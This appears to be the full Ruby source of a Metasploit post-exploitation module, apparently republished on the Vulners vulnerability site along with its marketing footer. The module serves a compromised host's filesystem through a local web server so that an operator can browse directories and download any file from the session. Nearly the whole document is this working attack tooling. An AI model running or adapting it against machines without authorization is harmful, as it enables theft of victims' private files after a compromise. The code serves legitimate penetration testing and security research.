##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'cgi'
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Browse the session filesystem in a Web Browser',
'Description' => %q{
This module allows you to browse the session filesystem via a local
browser window.
},
'License' => MSF_LICENSE,
'Author' => [ 'timwr'],
'Platform' => [ 'linux', 'win', 'osx' ],
'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
'Notes' => {
'Reliability' => [ ],
'SideEffects' => [ ],
'Stability' => [ CRASH_SAFE ]
}
)
)
end
def run
exploit
end
def primer
uri = get_uri.chomp('/') + '/'
current_dir = pwd
if session.platform == 'windows'
current_dir = current_dir.gsub('\\', '/')
end
print_status("Current directory: #{uri}#{current_dir}")
end
def list_path(file_path, uripath)
contents = []
if file_path == '/' && session.platform == 'windows'
get_drives.each do |drive|
driveurl = drive + ':/'
furl = uripath + driveurl
contents << [furl, driveurl]
end
return contents
end
base_url = uripath
if file_path.starts_with?('/')
base_url = base_url.chomp('/')
end
base_url += file_path.chomp('/') + '/'
dir(file_path).each do |file|
next if ['.', '..'].include?(file)
furl = base_url + file
contents << [furl, file]
end
contents
end
def handle_response(cli, request_uri)
uripath = get_resource.chomp('/')
# Convert http://127.0.0.1/URIPATH/file/ -> /file
if request_uri != uripath && request_uri.starts_with?(uripath)
file_path = request_uri[uripath.length, request_uri.length].chomp('/')
end
if file_path.blank?
file_path = '/'
end
uripath += '/'
# Convert /C: -> C:/
if session.platform == 'windows'
if file_path.starts_with?('/')
file_path = file_path[1, file_path.length]
end
if /([A-Z]):$/ =~ file_path
file_path += '/'
end
end
if file_path.blank?
file_path = '/'
end
print_status("Request uri: #{request_uri} file_path: #{file_path} from #{cli.peerhost}")
root_dir = (file_path == '/')
if file?(file_path) && !root_dir
# Download the file
data = read_file(file_path)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
return
elsif directory?(file_path) || root_dir
# List the directory
body = "<h2>Directory listing for #{CGI.escapeHTML(file_path)}</h2><hr>"
body << "<ul>\n"
unless root_dir
basedir = request_uri[0, request_uri.chomp('/').rindex('/')]
if basedir.blank?
basedir = '/'
end
body << "<li><a href=\"#{CGI.escapeHTML(basedir)}\">..</a>\n"
end
list_path(file_path, uripath).each do |furl, fname|
body << "<li><a href=\"#{CGI.escapeHTML(furl)}\">#{CGI.escapeHTML(fname)}</a>\n"
end
body << "</ul>\n"
html = %(<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<title>Metasploit File Sharing</title>
</head>
<body>
#{body}
</body>
</style>
</html>
)
send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
else
send_not_found(cli)
end
end
def on_request_uri(cli, request)
handle_response(cli, request.uri)
rescue ::Rex::Post::Meterpreter::RequestError
cli.send_response(create_response(500, 'Unknown error'))
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation